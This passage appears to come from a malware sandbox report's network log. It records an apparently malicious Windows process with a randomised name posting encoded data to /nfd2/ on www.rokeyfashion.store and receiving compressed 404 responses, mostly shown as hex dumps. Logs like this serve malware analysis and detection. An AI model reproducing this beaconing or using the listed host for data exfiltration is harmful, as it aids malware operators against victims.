                                                                Jan 11, 2025 09:16:05.145524979 CET1236INData Raw: b3 e8 cf c7 d7 7e 7f 3e 7e f3 f1 5a 7f de cd f6 ae 46 52 8c a4 b6 a6 16 c1 2a b9 01 57 0b 45 46 f7 b3 a1 63 a9 44 69 3f 7b f1 2b c1 f2 1f 9f 39 d4 28 3c f2 56 19 fe e2 df 9f d1 95 2b be e6 19 b9 dd 76 77 b3 b7 f7 3b 76 d8 5f a3 34 82 f2 20 fa 60
                                                                Data Ascii: ~>~ZFR*WEFcDi?{+9(<V+vw;v_4 `&BjIp`61P;?YMH>W8<zG?+)sT5IrKbdDuSR0gyW_"o%4Mv*mpy
                                                                Jan 11, 2025 09:16:05.145536900 CET1236INData Raw: 6d fd ca bc 0a c8 b4 3d 5a b6 ab ff 0b a9 bd 8f 1e ee b8 a1 47 32 1e ec 85 79 f5 b7 32 c7 62 d6 36 85 cb ce 22 16 28 4f 55 a4 b7 ef 93 41 8c 73 c9 21 67 c0 90 a7 e5 41 ae 3c 1b 53 01 2a c2 87 40 b5 c7 d1 d2 5a d1 07 bb 63 b3 a7 ce d3 ee e2 b8 78
                                                                Data Ascii: m=ZG2y2b6"(OUAs!gA<S*@Zcxh;4}oMy{R8.:'IilpK`2*Y8UcW31g{#Q&nnEPKv)Gq{H*vs=9Jo)Pkm|3YC!=y'
                                                                Jan 11, 2025 09:16:05.145550966 CET1236INData Raw: 77 48 7b aa 15 df 50 94 f6 03 0e 10 ec 77 74 d6 7c b0 22 63 15 9f e3 ab 59 1d 39 09 53 d0 44 67 55 cd 54 c8 94 98 3d 28 4b bb cb 6e b0 4e b2 83 43 f1 5a bd a8 e9 66 1f d2 cc 8b a4 6a 6b 46 2d 5b 34 ed f4 81 3f 0b 08 a3 ac 30 30 b8 6b 95 b1 5b ca
                                                                Data Ascii: wH{Pwt|"cY9SDgUT=(KnNCZfjkF-[4?00k[e5p'!?QZF~fBDE6&Zd+^h4XrUwLI@1$G1JX;8C6?wLQt'Lu.olvGg"RdJyHU\3{1~+A<8WS
                                                                Jan 11, 2025 09:16:05.145562887 CET1236INData Raw: 93 a3 8a d5 e0 f4 7e 3f 27 6f 78 b9 b6 af 04 0d 5b d9 4b ca 37 39 0a 3f ce 73 ce e1 26 47 60 b5 b4 fc da b8 48 29 41 79 76 62 c8 cf d7 6d 6b d2 a4 e9 83 63 82 b6 c9 8a 87 9b a6 71 1b f4 17 31 bc 0c 51 9e 73 4a 93 6c 6f 61 92 db bc 1e d6 ec d0 8c
                                                                Data Ascii: ~?'ox[K79?s&G`H)Ayvbmkcq1QsJloa{@#g~ORQUjedwMd0%SU"4dJW?{</B",\\I;a/C+1uB)l}sokb0ZUXhjc]/
                                                                Jan 11, 2025 09:16:05.145576000 CET1236INData Raw: 25 24 56 c8 aa 16 c0 1b 80 0a 33 18 a9 72 02 cc 7d 44 57 68 0c 8b e4 dc 52 b0 14 58 bf 58 57 02 aa e5 d2 19 64 53 61 49 c2 43 cd b8 af fd cd 33 da 40 70 6d ce ca 21 6b e7 83 db 81 91 ac 42 36 ca 45 28 f5 bd 2d 61 bf ba f6 6d 0d b2 b2 48 ce ee c0
                                                                Data Ascii: %$V3r}DWhRXXWdSaIC3@pm!kB6E(-amHh7*Qc>}q_S4+B[,V2)E#>['QL[gHUTsyh9u%yA1G?:bVR&`k:!B|Jaf>_jm'i]6'#
                                                                Jan 11, 2025 09:16:05.145689964 CET1236INData Raw: 6c 9a c8 89 eb 85 e8 28 6d 29 8a a8 92 9a 51 a4 cb 09 ca 34 90 27 30 bb 7a e6 af 43 4c 58 e9 b2 63 41 9c c6 37 ab 04 a6 ef 4a d7 4e 66 11 74 30 4a 7d 18 c9 77 dd 39 36 87 d7 1c 96 53 e8 f4 a3 72 36 d1 e2 7b 86 8f c0 0f eb e1 09 21 0e 2f 8d 17 96
                                                                Data Ascii: l(m)Q4'0zCLXcA7JNft0J}w96Sr6{!/O8!s38!4}P,]&IL*ufH@9sr24]iwu|a+][=km>n!>BiAMl}I7%eq:'z"
                                                                Jan 11, 2025 09:16:05.145730972 CET1000INData Raw: 43 ea 05 5a f8 83 8d b2 43 03 c5 d6 dc 36 2a 41 c7 32 f4 1d dc da 7c 7d 64 ae 50 6b bc fe 89 6b a9 ed 4a ed 59 cd 1c 6f 72 a2 0e c9 fb 73 37 c8 a6 5a b6 85 03 6a 58 e0 58 40 2b 95 5c cb b7 dc dc 3b 1e 3c 72 c3 71 57 8c f1 23 b3 fc e2 7a 91 46 6b
                                                                Data Ascii: CZC6*A2|}dPkkJYors7ZjXX@+\;<rqW#zFkR6}\kGofQ{Ckj.n#pSJNp@TXI-0,s<*;XxHLMI;~B'baH6&/Uz3zkD;*gD&{
                                                                Jan 11, 2025 09:16:05.145745039 CET1236INData Raw: 7b 8e 6e 41 79 30 06 f5 10 28 03 3f 38 50 36 a2 f6 c1 03 cc 82 ed d3 97 c3 7f 6d 0f c2 21 88 10 b0 ed 82 32 47 08 16 8e c8 d6 86 93 f2 18 1f 9e c3 ef ce d6 88 f2 3d a1 e4 f2 55 ac 64 6c f0 c9 24 52 90 47 6c 7a 43 0c 00 01 d9 61 3f e0 11 5b 0f c6
                                                                Data Ascii: {nAy0(?8P6m!2G=Udl$RGlzCa?[xWS-\m0^"ML/xqAxO(w5jm+!#jah6Zd$!a<f\fc'b:Ha o2!d>'w5)=R?Uuu/'<)V?"Ro
                                                                Jan 11, 2025 09:16:05.145756960 CET1236INData Raw: 0b 05 0c 0b 1c d7 9d 15 0e 64 8e 6c 9a 26 db 8e 6a 3d 75 b3 cd 52 91 6f 16 75 46 cf 18 e8 01 b1 87 bd 78 d4 2e 59 14 d2 75 61 9d 43 6d 85 9c 34 4e 0c 3e 34 79 1f e2 5d f4 97 09 87 f9 43 91 9a 7c 48 39 b0 e2 7f e1 03 3f 13 19 e7 ac ec eb d0 03 56
                                                                Data Ascii: dl&j=uRouFx.YuaCm4N>4y]C|H9?VuREVV#N\{Ys|"&T#3uQeH;]~wFWV@}unT&XKhQCOcsk/JpA&%e`d5YBcCNdw\eZ-t
                                                                Jan 11, 2025 09:16:05.150415897 CET1236INData Raw: c6 30 20 6c 21 29 e1 5c 59 78 75 95 7c 50 3a f1 6e d9 0d 21 e1 42 cc ab e1 3a 20 a5 37 70 90 f6 e3 03 8f fa 38 0e ef 1a ce 89 45 80 b7 bd ce 26 1f 89 5b d3 51 48 c6 6b 22 80 d4 ac d2 e5 0f 6f 10 8c d7 2f e4 07 01 44 70 d6 56 44 31 25 49 c5 2a 7d
                                                                Data Ascii: 0 l!)\Yxu|P:n!B: 7p8E&[QHk"o/DpVD1%I*}U(`p0DT!6!j6VORt_PI|1r@3MesfVtF^Ad">(3"2Le$</8l<0RK^)Vt'-


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.749987103.159.36.66803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:16:06.525942087 CET779OUTPOST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 240
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 41 78 51 79 53 73 53 59 66 4f 44 57 76 35 6a 53 50 6b 51 4d 56 36 72 73 56 41 74 7a 59 42 58 6d 33 2f 74 73 65 62 66 75 77 56 75 2b 6d 32 56 53 42 4e 4f 64 75 72 4e 49 35 43 4d 76 52 34 4c 41 65 4c 70 55 53 65 50 39 45 6d 64 6c 57 48 65 56 72 77 35 61 65 36 63 57 71 5a 67 42 56 76 44 58 6a 50 70 4d 79 43 68 48 67 42 58 35 4e 4d 6e 6c 42 75 63 55 61 55 6f 79 6e 76 71 72 39 47 4b 67 6f 77 75 54 70 55 76 6b 6d 6e 45 7a 48 75 61 53 38 54 35 61 34 44 46 4d 6f 6e 68 45 37 68 62 7a 55 69 2f 57 78 44 43 55 67 64 4a 68 49 59 4a 79 61 58 54 70 47 5a 73 45 41 56 2f 41 2b 31 33 6e 38 45 72 73 67 34 7a 34 63 66 31 31 57 61 77 78 64 39 2f 33 52 62 46 47 56 46 37 6d 4d 68 58 6d 62 49 2f 59 72 79 4d 3d
                                                                Data Ascii: UfjxuDP=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwVu+m2VSBNOdurNI5CMvR4LAeLpUSeP9EmdlWHeVrw5ae6cWqZgBVvDXjPpMyChHgBX5NMnlBucUaUoynvqr9GKgowuTpUvkmnEzHuaS8T5a4DFMonhE7hbzUi/WxDCUgdJhIYJyaXTpGZsEAV/A+13n8Ersg4z4cf11Wawxd9/3RbFGVF7mMhXmbI/YryM=
                                                                Jan 11, 2025 09:16:07.695336103 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:07 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 35 30 38 66 0d 0a 94 96 17 66 22 ec 3a a9 fd 87 44 54 d5 7e 58 91 81 6b d6 0f 01 aa 33 31 c6 0d fd f1 eb cf bf bf 08 8c 9b f8 58 e7 f9 fe df 5f 6a ff ed fc 7c dd e8 9d 1a e8 48 32 e0 1d 97 74 d6 ed a4 d3 be 25 ce 63 64 74 b1 95 08 89 91 84 b1 87 f1 65 cb aa 77 f7 e7 95 31 ec 61 d5 a4 dc ca d4 01 c8 73 1c e7 6b 4f 81 84 21 0a 03 2b a0 ca 5e 87 ff f6 be 56 ff 9d fc 7c b1 6c 69 33 b5 1b 61 38 08 21 a5 63 6f 39 ce 64 3b f3 4c 3f f7 79 af 0b c1 91 4d b7 24 34 80 ec 78 1e f7 b6 f6 75 3b 71 9c f7 18 66 3f 0a 42 44 16 f9 04 b5 f5 56 40 35 d4 37 8b 5d 49 74 f0 e7 f7 a6 9f 7c 4b 67 0b 77 01 da 4d 82 5a d7 4a 3f a8 a3 84 55 98 7c b6 e8 9c 73 2f 78 53 c0 a8 80 51 01 a3 02 24 2b 65 64 09 d4 73 cf 2d ef cd 9b 91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 [TRUNCATED]
                                                                Data Ascii: 508ff":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57]It|KgwMZJ?U|s/xSQ$+eds-<*nW+7-NRq&hCX0JNRg23LfWiV@w'_a~t3{)Ei@,@X?iv%0}fIDDQ1]Kn"?tkU&>;V^ua?q08>1$+@1KFQ(0$k`>zWS8"VDQDHA}j|PP>~o%}3&Q9O(NjX<MO]rw\|qLl'e>wZWpH~P]DL}kc3gb5n-f&&y=[DYo6kp|eM(5',x;?d5tCPN3nqf~V[/~-y:P@rJ
                                                                Jan 11, 2025 09:16:07.695373058 CET1236INData Raw: b3 e8 cf c7 d7 7e 7f 3e 7e f3 f1 5a 7f de cd f6 ae 46 52 8c a4 b6 a6 16 c1 2a b9 01 57 0b 45 46 f7 b3 a1 63 a9 44 69 3f 7b f1 2b c1 f2 1f 9f 39 d4 28 3c f2 56 19 fe e2 df 9f d1 95 2b be e6 19 b9 dd 76 77 b3 b7 f7 3b 76 d8 5f a3 34 82 f2 20 fa 60
                                                                Data Ascii: ~>~ZFR*WEFcDi?{+9(<V+vw;v_4 `&BjIp`61P;?YMH>W8<zG?+)sT5IrKbdDuSR0gyW_"o%4Mv*mpy
                                                                Jan 11, 2025 09:16:07.695389986 CET1236INData Raw: 6d fd ca bc 0a c8 b4 3d 5a b6 ab ff 0b a9 bd 8f 1e ee b8 a1 47 32 1e ec 85 79 f5 b7 32 c7 62 d6 36 85 cb ce 22 16 28 4f 55 a4 b7 ef 93 41 8c 73 c9 21 67 c0 90 a7 e5 41 ae 3c 1b 53 01 2a c2 87 40 b5 c7 d1 d2 5a d1 07 bb 63 b3 a7 ce d3 ee e2 b8 78
                                                                Data Ascii: m=ZG2y2b6"(OUAs!gA<S*@Zcxh;4}oMy{R8.:'IilpK`2*Y8UcW31g{#Q&nnEPKv)Gq{H*vs=9Jo)Pkm|3YC!=y'
                                                                Jan 11, 2025 09:16:07.695406914 CET1236INData Raw: 77 48 7b aa 15 df 50 94 f6 03 0e 10 ec 77 74 d6 7c b0 22 63 15 9f e3 ab 59 1d 39 09 53 d0 44 67 55 cd 54 c8 94 98 3d 28 4b bb cb 6e b0 4e b2 83 43 f1 5a bd a8 e9 66 1f d2 cc 8b a4 6a 6b 46 2d 5b 34 ed f4 81 3f 0b 08 a3 ac 30 30 b8 6b 95 b1 5b ca
                                                                Data Ascii: wH{Pwt|"cY9SDgUT=(KnNCZfjkF-[4?00k[e5p'!?QZF~fBDE6&Zd+^h4XrUwLI@1$G1JX;8C6?wLQt'Lu.olvGg"RdJyHU\3{1~+A<8WS
                                                                Jan 11, 2025 09:16:07.695425034 CET1236INData Raw: 93 a3 8a d5 e0 f4 7e 3f 27 6f 78 b9 b6 af 04 0d 5b d9 4b ca 37 39 0a 3f ce 73 ce e1 26 47 60 b5 b4 fc da b8 48 29 41 79 76 62 c8 cf d7 6d 6b d2 a4 e9 83 63 82 b6 c9 8a 87 9b a6 71 1b f4 17 31 bc 0c 51 9e 73 4a 93 6c 6f 61 92 db bc 1e d6 ec d0 8c
                                                                Data Ascii: ~?'ox[K79?s&G`H)Ayvbmkcq1QsJloa{@#g~ORQUjedwMd0%SU"4dJW?{</B",\\I;a/C+1uB)l}sokb0ZUXhjc]/
                                                                Jan 11, 2025 09:16:07.695444107 CET1236INData Raw: 25 24 56 c8 aa 16 c0 1b 80 0a 33 18 a9 72 02 cc 7d 44 57 68 0c 8b e4 dc 52 b0 14 58 bf 58 57 02 aa e5 d2 19 64 53 61 49 c2 43 cd b8 af fd cd 33 da 40 70 6d ce ca 21 6b e7 83 db 81 91 ac 42 36 ca 45 28 f5 bd 2d 61 bf ba f6 6d 0d b2 b2 48 ce ee c0
                                                                Data Ascii: %$V3r}DWhRXXWdSaIC3@pm!kB6E(-amHh7*Qc>}q_S4+B[,V2)E#>['QL[gHUTsyh9u%yA1G?:bVR&`k:!B|Jaf>_jm'i]6'#
                                                                Jan 11, 2025 09:16:07.695488930 CET1236INData Raw: 6c 9a c8 89 eb 85 e8 28 6d 29 8a a8 92 9a 51 a4 cb 09 ca 34 90 27 30 bb 7a e6 af 43 4c 58 e9 b2 63 41 9c c6 37 ab 04 a6 ef 4a d7 4e 66 11 74 30 4a 7d 18 c9 77 dd 39 36 87 d7 1c 96 53 e8 f4 a3 72 36 d1 e2 7b 86 8f c0 0f eb e1 09 21 0e 2f 8d 17 96
                                                                Data Ascii: l(m)Q4'0zCLXcA7JNft0J}w96Sr6{!/O8!s38!4}P,]&IL*ufH@9sr24]iwu|a+][=km>n!>BiAMl}I7%eq:'z"
                                                                Jan 11, 2025 09:16:07.695507050 CET1000INData Raw: 43 ea 05 5a f8 83 8d b2 43 03 c5 d6 dc 36 2a 41 c7 32 f4 1d dc da 7c 7d 64 ae 50 6b bc fe 89 6b a9 ed 4a ed 59 cd 1c 6f 72 a2 0e c9 fb 73 37 c8 a6 5a b6 85 03 6a 58 e0 58 40 2b 95 5c cb b7 dc dc 3b 1e 3c 72 c3 71 57 8c f1 23 b3 fc e2 7a 91 46 6b
                                                                Data Ascii: CZC6*A2|}dPkkJYors7ZjXX@+\;<rqW#zFkR6}\kGofQ{Ckj.n#pSJNp@TXI-0,s<*;XxHLMI;~B'baH6&/Uz3zkD;*gD&{
                                                                Jan 11, 2025 09:16:07.695523024 CET1236INData Raw: 7b 8e 6e 41 79 30 06 f5 10 28 03 3f 38 50 36 a2 f6 c1 03 cc 82 ed d3 97 c3 7f 6d 0f c2 21 88 10 b0 ed 82 32 47 08 16 8e c8 d6 86 93 f2 18 1f 9e c3 ef ce d6 88 f2 3d a1 e4 f2 55 ac 64 6c f0 c9 24 52 90 47 6c 7a 43 0c 00 01 d9 61 3f e0 11 5b 0f c6
                                                                Data Ascii: {nAy0(?8P6m!2G=Udl$RGlzCa?[xWS-\m0^"ML/xqAxO(w5jm+!#jah6Zd$!a<f\fc'b:Ha o2!d>'w5)=R?Uuu/'<)V?"Ro
                                                                Jan 11, 2025 09:16:07.695542097 CET1236INData Raw: 0b 05 0c 0b 1c d7 9d 15 0e 64 8e 6c 9a 26 db 8e 6a 3d 75 b3 cd 52 91 6f 16 75 46 cf 18 e8 01 b1 87 bd 78 d4 2e 59 14 d2 75 61 9d 43 6d 85 9c 34 4e 0c 3e 34 79 1f e2 5d f4 97 09 87 f9 43 91 9a 7c 48 39 b0 e2 7f e1 03 3f 13 19 e7 ac ec eb d0 03 56
                                                                Data Ascii: dl&j=uRouFx.YuaCm4N>4y]C|H9?VuREVV#N\{Ys|"&T#3uQeH;]~wFWV@}unT&XKhQCOcsk/JpA&%e`d5YBcCNdw\eZ-t
                                                                Jan 11, 2025 09:16:07.700385094 CET1236INData Raw: c6 30 20 6c 21 29 e1 5c 59 78 75 95 7c 50 3a f1 6e d9 0d 21 e1 42 cc ab e1 3a 20 a5 37 70 90 f6 e3 03 8f fa 38 0e ef 1a ce 89 45 80 b7 bd ce 26 1f 89 5b d3 51 48 c6 6b 22 80 d4 ac d2 e5 0f 6f 10 8c d7 2f e4 07 01 44 70 d6 56 44 31 25 49 c5 2a 7d
                                                                Data Ascii: 0 l!)\Yxu|P:n!B: 7p8E&[QHk"o/DpVD1%I*}U(`p0DT!6!j6VORt_PI|1r@3MesfVtF^Ad">(3"2Le$</8l<0RK^)Vt'-


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                19192.168.2.749988103.159.36.6680
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:16:09.566020966 CET1792OUTPOST /nfd2/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.rokeyfashion.store
                                                                Origin: http://www.rokeyfashion.store
                                                                Referer: http://www.rokeyfashion.store/nfd2/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 41 78 51 79 53 73 53 59 66 4f 44 57 76 35 6a 53 50 6b 51 4d 56 36 72 73 56 41 74 7a 59 42 58 6d 33 2f 74 73 65 62 66 75 77 54 32 2b 6d 48 31 53 62 75 57 64 76 72 4e 49 6c 53 4d 73 52 34 4c 6e 65 4c 78 51 53 66 79 41 45 6b 31 6c 58 6c 57 56 36 78 35 61 58 36 63 57 6f 5a 67 45 4e 50 44 43 6a 50 59 48 79 43 78 48 67 42 58 35 4e 4a 72 6c 58 50 63 55 59 55 6f 31 75 50 71 33 77 6d 4b 59 6f 77 57 70 70 55 6a 30 6d 58 6b 7a 47 4f 71 53 36 68 52 61 35 6a 46 4f 70 6e 68 63 37 68 58 73 55 69 79 74 78 44 66 37 67 66 5a 68 49 76 67 4f 64 33 75 30 46 5a 59 74 4a 6b 65 68 70 30 72 54 2b 6c 44 6d 6f 37 44 46 55 49 42 65 57 4c 64 77 5a 61 37 36 42 34 46 47 59 30 33 43 4b 45 4b 4d 63 72 76 75 33 58 59 50 36 4e 6a 4d 34 31 33 4f 2f 4b 53 43 57 4a 46 4d 71 64 65 7a 66 61 36 56 37 4e 59 6d 65 64 6a 44 4c 35 58 79 6c 46 4e 6c 64 36 64 56 66 38 69 76 78 43 56 32 45 36 6e 34 65 70 78 42 67 4a 6d 64 57 50 53 46 42 43 48 6d 43 48 72 36 31 35 62 74 6e 61 45 62 41 61 6b 34 70 35 79 30 41 4e 7a 34 4e 68 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwT2+mH1SbuWdvrNIlSMsR4LneLxQSfyAEk1lXlWV6x5aX6cWoZgENPDCjPYHyCxHgBX5NJrlXPcUYUo1uPq3wmKYowWppUj0mXkzGOqS6hRa5jFOpnhc7hXsUiytxDf7gfZhIvgOd3u0FZYtJkehp0rT+lDmo7DFUIBeWLdwZa76B4FGY03CKEKMcrvu3XYP6NjM413O/KSCWJFMqdezfa6V7NYmedjDL5XylFNld6dVf8ivxCV2E6n4epxBgJmdWPSFBCHmCHr615btnaEbAak4p5y0ANz4NhGegA9stWLMXVV3r8E48lkLGt+2PoHgxDFJJQr8qi+lUGroTd46CNRzOHRPr9OmeXEl82ayCCDaWmSE9LQ4oFNQ2bfYGC+I0kf3IAcyHHCZVmXZ9sHRIvqeoM4UZsJV2+bxm8CQ93ggsc4PXd6nwhCwrmUQBM3qO83xWG+U4xxczt6mCqT91Qb9A3nb6jp1FvLNfQErYGQJmkNoiO/cK6H5Rmvwi7egUuUO4/JEyckEx6OjYbPNECzEL87dhbEQ9OfxGcCFSn288KBaGDy4jA2wxMvz47eVLjwaKpbojoPlW4TB+YSEYiOKGCpgZ7LSE04/19Mv8kGfidQQI62S1axQAfBBAIN6WswCsxWdppVBTwS320iVMvGY4mEVvAYHv2L5pbJcXgmBGBpUIb6TBSwFarLGhqhkE6UOzyTLcg5S0YHes7OPQqzfLZev5u3KXwU0egAikuzVNG4XjEOtKB+N5dLZ0qgTi0poI0hPjtynzaAR6vjKO0DTlKUGnsoehDUUutWWN89yc62simsy9ux3gIRJJWF/OPHjZWXjMCZIXuI/TSebQG8lDGi8GYr+O03EJF0Fjl9yooXFrGe35IEU8dwVgOCdBa//CBZwKGnC6l8eGrBCMBf904TZH9Yx4Kesvh597gEJa3PCtYW/F4FX3D/2+1Pf3Tnc [TRUNCATED]
                                                                Jan 11, 2025 09:16:10.742574930 CET1236INHTTP/1.1 404 Not Found
                                                                Connection: close
                                                                x-litespeed-tag: 2ea_HTTP.404
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://rokeyfashion.store/wp-json/>; rel="https://api.w.org/"
                                                                x-litespeed-cache-control: no-cache
                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                transfer-encoding: chunked
                                                                content-encoding: br
                                                                vary: Accept-Encoding
                                                                date: Sat, 11 Jan 2025 08:16:10 GMT
                                                                server: LiteSpeed
                                                                Data Raw: 35 30 39 30 0d 0a 94 96 17 66 22 ec 3a a9 fd 87 44 54 d5 7e 58 91 81 6b d6 0f 01 aa 33 31 c6 0d fd f1 eb cf bf bf 08 8c 9b f8 58 e7 f9 fe df 5f 6a ff ed fc 7c dd e8 9d 1a e8 48 32 e0 1d 97 74 d6 ed a4 d3 be 25 ce 63 64 74 b1 95 08 89 91 84 b1 87 f1 65 cb aa 77 f7 e7 95 31 ec 61 d5 a4 dc ca d4 01 c8 73 1c e7 6b 4f 81 84 21 0a 03 2b a0 ca 5e 87 ff f6 be 56 ff 9d fc 7c b1 6c 69 33 b5 1b 61 38 08 21 a5 63 6f 39 ce 64 3b f3 4c 3f f7 79 af 0b c1 91 4d b7 24 34 80 ec 78 1e f7 b6 f6 75 3b 71 9c f7 18 66 3f 0a 42 44 16 f9 04 b5 f5 56 40 35 d4 37 8b 5d 49 74 f0 e7 f7 a6 9f 7c 4b 67 0b 77 01 da 4d 82 5a d7 4a 3f a8 a3 84 55 98 7c b6 e8 9c 73 2f 78 53 c0 a8 80 51 01 a3 02 24 2b 65 64 09 d4 73 cf 2d ef cd 9b 91 3c 2a 6e b2 57 2b e9 37 97 2d 92 dc 1a 90 bf 17 c8 4e d3 ff a9 0d 06 06 cb 8e b6 94 86 52 08 9e f4 71 d0 26 68 43 58 00 80 01 30 ff b7 ac 14 4a 4e 19 09 1b d1 52 de 67 14 32 33 b5 01 fd bf aa de f3 4c cf 80 d9 00 66 57 69 56 b7 40 ca b3 77 27 e5 5f d5 61 7e f7 8c 74 d5 33 0a dd 7b 0e bd a7 d4 eb d8 0a 29 [TRUNCATED]
                                                                Data Ascii: 5090f":DT~Xk31X_j|H2t%cdtew1askO!+^V|li3a8!co9d;L?yM$4xu;qf?BDV@57]It|KgwMZJ?U|s/xSQ$+eds-<*nW+7-NRq&hCX0JNRg23LfWiV@w'_a~t3{)Ei@,@X?iv%0}fIDDQ1]Kn"?tkU&>;V^ua?q08>1$+@1KFQ(0$k`>zWS8"VDQDHA}j|PP>~o%}3&Q9O(NjX<MO]rw\|qLl'e>wZWpH~P]DL}kc3gb5n-f&&y=[DYo6kp|eM(5',x;?d5tCPN3nqf~V[/~-y:P@rJ
                                                                Jan 11, 2025 09:16:10.742685080 CET224INData Raw: b3 e8 cf c7 d7 7e 7f 3e 7e f3 f1 5a 7f de cd f6 ae 46 52 8c a4 b6 a6 16 c1 2a b9 01 57 0b 45 46 f7 b3 a1 63 a9 44 69 3f 7b f1 2b c1 f2 1f 9f 39 d4 28 3c f2 56 19 fe e2 df 9f d1 95 2b be e6 19 b9 dd 76 77 b3 b7 f7 3b 76 d8 5f a3 34 82 f2 20 fa 60
                                                                Data Ascii: ~>~ZFR*WEFcDi?{+9(<V+vw;v_4 `&BjIp`61P;?YMH>W8<zG?+)sT5IrKbdDuSR0gyW_"o
                                                                Jan 11, 2025 09:16:10.742700100 CET1236INData Raw: 25 c4 81 a6 34 4d 76 9e f8 2a 6d 70 80 8f ca 84 79 fe 85 73 e2 1a 23 3f 62 f8 a1 15 47 fc 5a 04 01 fe fd 14 97 22 88 84 ba 32 c6 eb a5 a6 29 28 46 3a 2f aa 0b fc ec 0e 98 5d 87 7a 91 86 bc 71 3f 80 65 59 ba a7 f0 7c 4b 88 fc 8a fe c5 f9 41 85 fa
                                                                Data Ascii: %4Mv*mpys#?bGZ"2)(F:/]zq?eY|KAdGhq$#%^nM3T|%kk#Fa}lZ)Nh,<,}/?N7e(^7$!>:D^\,f
                                                                Jan 11, 2025 09:16:10.742717981 CET224INData Raw: 01 1a 33 59 9e da e6 43 21 3d fb 79 27 e2 80 01 17 ba c8 41 07 16 a4 55 83 4c 79 36 b7 80 0a 76 fc cc 17 22 94 41 99 8c e3 5f ea 91 3b 7c 30 bd 59 9d 38 22 d3 ca 07 6c d9 7e f7 d6 28 6b 60 83 b6 19 8d ec 9a 67 33 86 df b4 38 0b 17 33 4b 0a 49 60
                                                                Data Ascii: 3YC!=y'AULy6v"A_;|0Y8"l~(k`g383KI`,-*x5/L_bn78YDG'd3rnO2]J;Fbr5`mb.v_,L;FZrgeJS`FRLl]
                                                                Jan 11, 2025 09:16:10.742749929 CET1236INData Raw: ed d7 d5 38 13 de 63 f0 b3 f3 9d a2 50 d7 8e 69 7c af c8 a1 66 5b be fc 98 d1 fb 60 5b 74 6c 64 9c 06 f5 83 e8 9a af 57 aa fa 28 db e9 c4 ee 3c bf b3 93 94 67 c7 0a 76 16 0b 78 09 63 f5 ec 97 6f d6 4b 6c 6f 5c 79 76 4a 4f 52 9d a9 6c f6 0e b2 67
                                                                Data Ascii: 8cPi|f[`[tldW(<gvxcoKlo\yvJORlg.C'$<v]al2%)|`mb<^M2=]/]~,Md+xx-&(?kk`5@SG6"+]Y%cCZ
                                                                Jan 11, 2025 09:16:10.742949963 CET1236INData Raw: de 50 54 39 76 b4 7d d0 ca 64 41 0d e2 ae 5f b6 cd 09 bf 14 6c f2 67 43 13 e8 e7 26 a9 0a 41 b3 c9 52 87 91 27 29 82 28 ed bd b4 4c 7f 46 de 09 47 a7 5c 4e 72 1a 85 a5 10 1d bd 8a 72 a0 0e 2c 88 a3 e4 da a9 40 c7 cd b9 28 c8 3c ca 8b 5c f3 02 52
                                                                Data Ascii: PT9v}dA_lgC&AR')(LFG\Nrr,@(<\RR6^vT&/S6X'o %])83z7h&m"0P~1bR G%@j?B&CJUNy]BC0RWbr&^G,V3%8TPyWMgY-
